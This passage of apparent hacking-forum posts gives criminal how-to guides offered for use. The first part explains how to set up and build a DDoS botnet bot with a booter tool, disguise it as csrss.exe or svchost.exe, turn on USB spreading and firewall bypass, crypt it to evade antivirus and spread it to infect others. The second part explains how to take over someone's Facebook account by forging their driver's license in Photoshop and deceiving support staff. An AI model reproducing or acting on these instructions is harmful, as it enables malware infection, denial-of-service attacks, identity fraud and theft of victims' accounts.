3rd. Go to your cmd prompt, and type the following.

IPconfig,

your ip address and default gateway will pop up.
open your internet and type the default gateway in the address bar press enter.
this is going to be taking you into your router settings. some require passwords.

Once you are in you need to open the port that your specific booter requires. for example DDoSeR requires port 3086 UDP/TCP

If need help, opening ports please. refer to the following site and find your router.
http://www.portforward.com

Okay once we have your port opened go back to the booter and follow these steps.

1st. Go the the booter find the settings tab or where ever it is to make your bot

It will ask you for your DNS which is what you made above ^^^
Some booters may ask the port you just opened.
all booters will ask you what you want to name it.
name it something that wont be suspicious like this EX: Csrss.exe / svchost.exe
Some will ask if you want to USB Spread or bypass Firewall choose your proper settings.

Then save/build it.
Once you do some booters require you to go to the main screen and right click and click listen some auto listen on the port and some booters you can toggle auto-listen on or off.

ok so now that your listening on the port that you opened were going to be running a test to make sure your bot works.

Double click or open your bot and look for it to pop in your connections list.

You can right click and click uninstall. or push CTRL+ALT+DEL. and find the process which will be listed as what you put above. csrss.exe / svchost.exe end that process your bot will disappear which is good because you want to infect
others not yourself.

Once you get the bot that works make sure you find someone to make your bot undetectable/crypt it, and then you will be set and ready to go!

once crypted start spreading you can choose to buy that tutorial from me or you can try to figure the best way to do this on the internet I wish you the best of luck on your booting and whatever you possibly decide to get into,
and welcome to the scene.

This is just the text that I wrote, if want the whole thing here's a direct link to the folder. good luck all.

The Link Contains photos :) as well as this text document for you to refer back to just in case you forget anything.

Link --> http://data.quickupload.org/DDoSing-TUT.RAR

Pictures -

IP Config in CMD
IP config in the cmd prompt
[Image: cmdpic.jpg]
Ports
Ports
[Image: ports.jpg]
No-Ip add host
No-Ip.com add host
[Image: no-ipaddhost.jpg]

DDoSeR 4.2 Profile maker
DDoSeR 4.2 profile creator
[Image: BotBuilderSetup.jpg]

Bot Build
Bot Build
[Image: buildbot.jpg]

Test to make sure all went properly
Test to see if ports and bot and no-ip was all setup correctly open bot on your own computer :)
[Image: bottest.jpg]

Extra Sceenies

Labels:

*NEW* method to hack facebook acounts *VERY DETAILED*

(Disclaimer) this TUT is for educational purposes ONLY Hehe

BACKGROUND:
i actually tried this method while trying to retrieve a friends disabled facebook back yesterday and it worked, so this method is recent. i apologize if this in particular has been posted before. i have not seen it.



THINGS YOU WILL NEED:
1. A slave to hack
2. adobe photoshopCS-any version
3. a straight forward picture of your slave
4. an ID/ drivers license template(can be found in google images.)
5. a working printer and a camera

WHY YOU WILL NEED THESE THINGS
well as we all know facebook security is really strict, but there are ways to trick facebook support and ill show you one. when you click on forgot password it will take you to a page to put in your slaves email address.


after you have entered their email it will take you to this form

once you have confirmed it is your account they will ask to reset the password but you dont want this! click that you no longer have access to the email/emails
if the person has set a security question for their account it will take you to this page

NOW this is where social engineering comes into play. you will need to make a new email with their full name and use it in this step to receive emails from facebook support. as soon as you enter the email they will ask you the persons security question
DONT WORRY! if you dont know the answer to their question(8/10 you wont) then just enter in whatever a few times then they will redirect you to another form
okay now you will enter in that email you made with their name on it and put it in here. facebook support will email you asking what the problem is. tell them "my name is *slaves full name here*. and i dont have access to my facebook email address *slaves email address here*. i would like to recover my account back please." of course they will reply saying "at this time we cant verify the ownership of this account. please reply to this email and attach a digital image of your government issued identification."

AND NOW THIS IS WHERE IT GETS GOOD!
i will tell you how to make a fake id with their picture and send it back to facebook to trick them into thinking you are actually the slave. FB is not the actual government so they dont have the database of the actual id cards.

GETTING STARTED:

STEP 1.
Now obviously, the first thing you want to acquire is a hackable slave or person you are friends with on facebook. you will need to know their exact birthday and full name. easily found on their facebook profile. if you dont know and are not friends with them, find a creative way to ask(for example on tumblr). after you have found somebody to hack the next thing to do is find a straight forward picture of that person like ones you find on ID cards

PLEASE NOTE THE BACKGROUND ON THE IMAGE WILL NOT MATTER BECAUSE YOU WILL BE REPLACING IT IN PHOTOSHOP!Devlish

STEP 2:
go to google images and type in the following "*state slave lives in* drivers license." numerous peoples licenses from the state will show up and they are real so you can use one of those as a template to make your own fake ID. save one that is a good size and good quality. for example

PLEASE NOTE THAT THE NAME, ADDRESS AND OTHER INFORMATION ON THE CARD IS NOT IMPORTANT BECAUSE YOU WILL REMOVE IT IN PHOTOSHOP.



STEP 3:
go to http://www.adobe.com/downloads/ and download the trail version of adobe photoshop CS5 extended if you do not have it already. YES it is free for 30 days Cool

STEP 4:
you will need to open adobe photoshop and begin to manipulate the ID/drivers license card. sorry newbies but some prior knowledge of photoshop is required for this step Whistle ....first thing you need to do is analyze the card then take the clone stamp tool and erase/clone over the original name and birthdate only! this does not take long actually if you are careful.(perfect detail is not important so dont be a perfectionist)
then use estrangelo edessa font to rewrite in your slaves full name and birthday for example
[Image: florida2010dl123.jpg] Tongue

STEP 5:
you need to replace the ID photo with your slaves. take the slaves picture and crop it to just their head and maybe shoulders if it looks okay.(observe other drivers licenses pictures to see the background color)delete the background by using the magic wand tool and cutting it out. replace it with the states usual DL backdrop color.

STEP 6:
after you have the new pic, name and birth date on the card print it out and take a decent picture of it. use your common sense. it is paper so dont take a whole picture showing its fake.take an up close shot so they can see the picture good and the name. it may look fake on a computer but taken from a digital camera it looks very convincing. upload it back to your computer for final changes.

STEP 7:
in the email facebook sends you they state to mark out any unneeded info like the driver license number, address, sig etc. only show the picture, birth date and full name. so this is great news for us!!! go 2 MS paint or picnik.com and use the doodle tool to black out the personal info on the card like so i say use ms paint or a website app to black it out cause they might check for photoshopped pictures. no need to answer extra questions ya know?

once it looks convincing to YOU then reply to the email they sent and attach the picture following the rules( must be in color etc)

THIS IS VERY DETAILED BECAUSE IT ACTUALLY DOES WORK IF YOU HAVE NO OTHER OPTIONS LIKE KEYLOG OR RAT THE PERSON. TAKES LESS THAN AN HOUR TO MANIPULATE THE ID AND FACEBOOK WILL RESPOND THE VERY NEXT DAY TELLING YOU THEY RESET THE PASSWORD. I CHOOSE TO SEND THE EMAIL FROM MY IPOD WHICH DOES NOT LEAVE A TRACE OF MY IP. IF YOU DECIDE TO DO THIS BE MORE SMART AND MAYBE USE A VPN PROXY OR SOMETHING LIKE THAT. HOPE THIS HELPS SOMEBODY

Labels: